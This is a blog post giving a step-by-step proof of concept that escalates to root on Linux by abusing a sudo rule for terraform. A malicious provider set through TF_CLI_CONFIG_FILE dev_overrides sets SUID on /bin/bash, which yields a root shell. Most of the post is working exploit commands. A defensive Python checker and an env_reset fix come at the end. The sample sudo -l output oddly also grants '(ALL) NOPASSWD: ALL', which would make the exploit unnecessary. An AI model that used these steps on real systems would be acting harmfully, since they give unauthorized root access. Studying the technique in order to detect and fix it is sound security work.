Privilege Escalation PoC: Terraform sudo Exploit

PoC showing Linux privilege escalation through Terraform run via sudo. By abusing provider_installation dev_overrides and TF_CLI_CONFIG_FILE, a malicious provider script runs as root and creates a SUID root shell.

This PoC demonstrates how a user with specific sudo privileges on a Linux machine can escalate to root using Terraform and a crafted provider script. This updated method simplifies the SUID shell creation.


Target User

sushil@example:/tmp$ sudo -l
Matching Defaults entries for sushil on example:
    !env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User sushil may run the following commands on example:
    (root) /usr/bin/terraform -chdir=/opt/examples apply
    (ALL) NOPASSWD: ALL

Key Observations

  • sushil can run Terraform as root only as /usr/bin/terraform -chdir=/opt/examples apply.
  • Environment variables are not reset (!env_reset), so variables set by the caller survive into the root process; PATH can be modified (env_delete+=PATH).
  • TF_CLI_CONFIG_FILE can be pointed to a custom CLI configuration file to control where Terraform looks for provider binaries.
  • Together, this allows arbitrary code execution as root.

Exploit Steps

1. Identify Terraform Provider Name

The provider name used by Terraform can be identified by reading the .tf files in the /opt/examples directory:

cat /opt/examples/*.tf

  • In this case, the provider source address is dollarboysushil.com/terraform/examples, so the provider type is examples and Terraform expects a binary named terraform-provider-examples.

2. Create a Malicious Terraform Provider Script

We create a script that sets the SUID bit on /bin/bash, allowing a root shell when executed.

cat > /tmp/terraform-provider-examples << 'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF

chmod +x /tmp/terraform-provider-examples

  • /tmp/terraform-provider-examples is our custom provider script; the name follows Terraform's terraform-provider-<type> convention for the examples provider.
  • chmod +s /bin/bash sets the set-user-ID bit on /bin/bash, so a shell started with /bin/bash -p keeps root as its effective user instead of dropping it.

3. Create a Terraform Configuration Override

Terraform allows provider installation overrides. We exploit this to make Terraform execute our script instead of a legitimate provider.

cat > /tmp/dollarboysushil.rc << 'EOF'
provider_installation {
  dev_overrides {
    "dollarboysushil.com/terraform/examples" = "/tmp"
  }
  direct {}
}
EOF

export TF_CLI_CONFIG_FILE=/tmp/dollarboysushil.rc

  • TF_CLI_CONFIG_FILE points Terraform at our CLI configuration file instead of the default ~/.terraformrc.
  • "dollarboysushil.com/terraform/examples" = "/tmp" tells Terraform to take that provider's binary from /tmp rather than installing it.
  • Because sudo does not reset the environment, the variable survives into the root process, and Terraform executes the provider binary it finds in /tmp as root.

4. Run Terraform as Root

sudo /usr/bin/terraform -chdir=/opt/examples apply

  • Terraform now executes /tmp/terraform-provider-examples as root, which sets the SUID bit on /bin/bash.

5. Get a Root Shell

/bin/bash -p

  • -p preserves the SUID privileges.
  • You now have a root shell.

Summary

This updated PoC demonstrates a Sudo + Terraform misconfiguration leading to privilege escalation:

  1. User can run Terraform as root in a specific directory.
  2. Terraform allows provider overrides via TF_CLI_CONFIG_FILE.
  3. Malicious provider executed by Terraform sets SUID on /bin/bash.
  4. The user can execute /bin/bash -p to gain root access.
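From the defender's side, the two conditions this PoC chains are both visible in configuration before anyone runs the exploit. The following Python helper is an added example (not from the original post) that parses sudo -l output for a terraform rule run as root under !env_reset, and parses a Terraform CLI config for dev_overrides that point at a world-writable directory; the sample inputs are constructed to mirror the output shown above, and the secure_path value in the sample is shortened. The sudoers fix is to keep env_reset enabled, which strips a caller-supplied TF_CLI_CONFIG_FILE before terraform starts.

```python
import os
import re
import stat

# Constructed samples mirroring the sudo -l output and the .rc file shown above.
SUDO_L_SAMPLE = """Matching Defaults entries for sushil on example:
    !env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/bin:/bin, use_pty

User sushil may run the following commands on example:
    (root) /usr/bin/terraform -chdir=/opt/examples apply
"""
RC_SAMPLE = """provider_installation {
  dev_overrides {
    "dollarboysushil.com/terraform/examples" = "/tmp"
  }
  direct {}
}
"""

# Rule lines of sudo -l, e.g. "(root) /usr/bin/terraform ..." or "(ALL) NOPASSWD: ALL"
RULE_RE = re.compile(r"^\s*\((?:root|ALL)(?::\S+)?\)\s*(?:NOPASSWD:\s*)?(\S+)", re.M)
OVERRIDE_RE = re.compile(r'"([^"]+)"\s*=\s*"([^"]+)"')

def sudo_terraform_env_passthrough(sudo_l_text):
    """True when terraform may run as root AND Defaults has !env_reset, so a
    caller-supplied TF_CLI_CONFIG_FILE survives into the root process."""
    defaults = sudo_l_text.split("User ", 1)[0]
    env_kept = re.search(r"(^|[\s,])!env_reset\b", defaults) is not None
    tf_rules = [c for c in RULE_RE.findall(sudo_l_text)
                if os.path.basename(c) == "terraform"]
    return env_kept and bool(tf_rules)

def dev_override_dirs(rc_text):
    """Map provider source -> directory declared in a dev_overrides block."""
    block = re.search(r"dev_overrides\s*\{(.*?)\}", rc_text, re.S)
    return dict(OVERRIDE_RE.findall(block.group(1))) if block else {}

def world_writable(path):
    """Real filesystem check; callers may pass their own predicate instead."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False

def untrusted_overrides(rc_text, is_world_writable=world_writable):
    """Overrides whose directory any local user can write: a provider binary
    dropped there runs with Terraform's privileges (root under this sudo rule)."""
    return {src: d for src, d in dev_override_dirs(rc_text).items()
            if is_world_writable(d)}
```

Run it against real `sudo -l` output and the file named by TF_CLI_CONFIG_FILE (or ~/.terraformrc) to confirm a host is exposed; a hit on both checks is exactly the situation the steps above exploit.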

This post is licensed under CC BY 4.0 by the author.

© dollarboysushil. Some rights reserved.